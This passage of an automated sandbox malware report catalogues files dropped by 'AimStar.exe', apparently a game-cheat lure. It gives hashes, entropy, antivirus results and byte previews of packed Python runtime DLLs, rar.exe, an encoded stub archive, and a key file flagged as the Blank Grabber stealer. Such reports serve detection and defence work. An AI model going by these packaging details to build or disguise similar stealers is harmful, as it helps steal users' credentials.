Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........c..\..}\..}\..}UzR}Z..}M..\|^..}M..\|_..}M..\|T..}M..\|Q..}..\|^..}\..}...}...\|U..}..\|]..}..\|]..}.>}]..}..\|]..}Rich\..}........PE..d....WOg.........." ...*.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61432
Entropy (8bit):	7.832464272741381
Encrypted:	false
SSDEEP:	1536:6Ze1bxjT8JFeEl4m6MisPI9eATFaImvQgNyUzR9+fIP2:6AbFT8JcEem65sw9eSgImvQgtu
MD5:	F018B2C125AA1ECC120F80180402B90B
SHA1:	CF2078A591F0F45418BAB7391C6D05275690C401
SHA-256:	67A887D3E45C8836F8466DC32B1BB8D64C438F24914F9410BC52B02003712443
SHA-512:	C57580AF43BC1243C181D9E1EFBC4AA544DB38650C64F8ECE42FBCBE3B4394FCADB7ACFB83E27FBE4448113DB1E6AF8D894FB4BD708C460CF45C6524FCFDEF96
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X[..95..95..95..A...95...4..95.....95...6..95...1..95...0..95.1.4..95..4..95..94..85.1.8..95.1.5..95.1...95.1.7..95.Rich.95.................PE..d....WOg.........." ...*............`-.......................................P............`..........................................K..P....I.......@.......................K......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70512
Entropy (8bit):	7.839717554547019
Encrypted:	false
SSDEEP:	1536:iDX4m2+uSKd7nh+5qr2UmGPijcXvyOVBbUImL7bJ7yUzR9UfI+vbGVx:KRud7E3U0cXJ/AImL7b/1Vx
MD5:	309B1A7156EBD03474B44F11BA363E89
SHA1:	8C09F8C65CAC5BB1FCF43AF65A7B3E59A9400990
SHA-256:	67ED13570C5376CD4368EA1E4C762183629537F13504DB59D1D561385111FE0A
SHA-512:	E610A92F0E4FA2A6CD9AFD7D8D7A32CC5DF14E99AF689BFB5A4B0811DCA97114BF3FCF4BFAE68600ED2417D18EE88C64C22B0C186068AFD4731BE1DE90C06F15
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.^.............~!.....................................-...................4..........-.......-.......-.M.....-.......Rich............PE..d....WOg.........." ...*.........@.......P...................................0............`.........................................l,..d....)....... ..........t............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1396821
Entropy (8bit):	5.531015514770172
Encrypted:	false
SSDEEP:	12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
MD5:	18C3F8BF07B4764D340DF1D612D28FAD
SHA1:	FC0E09078527C13597C37DBEA39551F72BBE9AE8
SHA-256:	6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
SHA-512:	135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
Malicious:	false
Preview:	PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI72842\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\python313.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1850360
Entropy (8bit):	7.9939340697016155
Encrypted:	true
SSDEEP:	49152:VfOZocB9lcRar86XqS2fUbe1F6lRiPp3UdwT6m5FmZ9UTCO:VYB9GRag6kfQe1kyx3UdzscZk
MD5:	9A3D3AE5745A79D276B05A85AEA02549
SHA1:	A5E60CAC2CA606DF4F7646D052A9C0EA813E7636
SHA-256:	09693BAB682495B01DE8A24C435CA5900E11D2D0F4F0807DAE278B3A94770889
SHA-512:	46840B820EE3C0FA511596124EB364DA993EC7AE1670843A15AFD40AC63F2C61846434BE84D191BD53F7F5F4E17FAD549795822BB2B9C792AC22A1C26E5ADF69
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.0.......0J..]e..@J..................................Pf...........`.........................................H.e......ye......pe......P]..............Gf.,............................je.(...Pje.@...........................................UPX0.....0J.............................UPX1.....0...@J..,..................@....rsrc........pe......0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI72842\select.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27640
Entropy (8bit):	7.429887403983581
Encrypted:	false
SSDEEP:	768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
MD5:	933DA5361079FC8457E19ADAB86FF4E0
SHA1:	51BCCF47008130BAADD49A3F55F85FE968177233
SHA-256:	ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
SHA-512:	0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{..(..(..(.R.(..(..)..(..)..(..)..(..)..(w..)..(..(..(...)..(w..)..(w..)..(w..(..(w..)..(Rich..(................PE..d....WOg.........." ....0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\skoch.aes

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	219904
Entropy (8bit):	7.886054749844031
Encrypted:	false
SSDEEP:	3072:mJI949SB5t+JhJLoB3UhtuSmLCzAFUn8CPlZGmW7KnuuMElFNxpVuQjYMSQxJUC:gI94wXt+SUjx8OlTW7GfnhV1kMpxJD
MD5:	0FD870F47255E0D459BB1C6C1B3DF537
SHA1:	9DDF0F72470A06D09CF86FA578300550611461CB
SHA-256:	96AF393C8A8E46AF7FD89C8D06CAB36B2212CD3CDB51A9368B55ED37B9CC9733
SHA-512:	E85760435AF1956753E6FCFD9119934EACB1D6AA65833E09B977E8C79E97EDC4A66585086EDDF861ED3EC6B953FA0FCA935748E2B097493447B3FAE91E6AEBDD
Malicious:	false
Preview:	PK........#.!Z.K.i.Z...Z......stub-o.pyc........2atg..............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

C:\Users\user\AppData\Local\Temp\_MEI72842\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	661360
Entropy (8bit):	7.993016249967087
Encrypted:	true
SSDEEP:	12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
MD5:	FF62332FA199145AAF12314DBF9841A3
SHA1:	714A50B5351D5C8AFDDB16A4E51A8998F976DA65
SHA-256:	36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
SHA-512:	EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(\|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	269032
Entropy (8bit):	7.980717016340488
Encrypted:	false
SSDEEP:	6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
MD5:	867ECDE9FF7F92D375165AE5F3C439CB
SHA1:	37D1AC339EB194CE98548AB4E4963FE30EA792AE
SHA-256:	A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
SHA-512:	0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0j04nvtp.rbn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abym4xun.c4j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egtmpnkj.got.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_flgh1sfs.osk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jeab1d51.xz5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg2rohut.xut.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmhrehgl.rh0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mki5fap5.c4t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo3ccupz.gwi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzhjkuoh.a1d.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhzfxlzh.a3q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nszvfxj2.ua3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
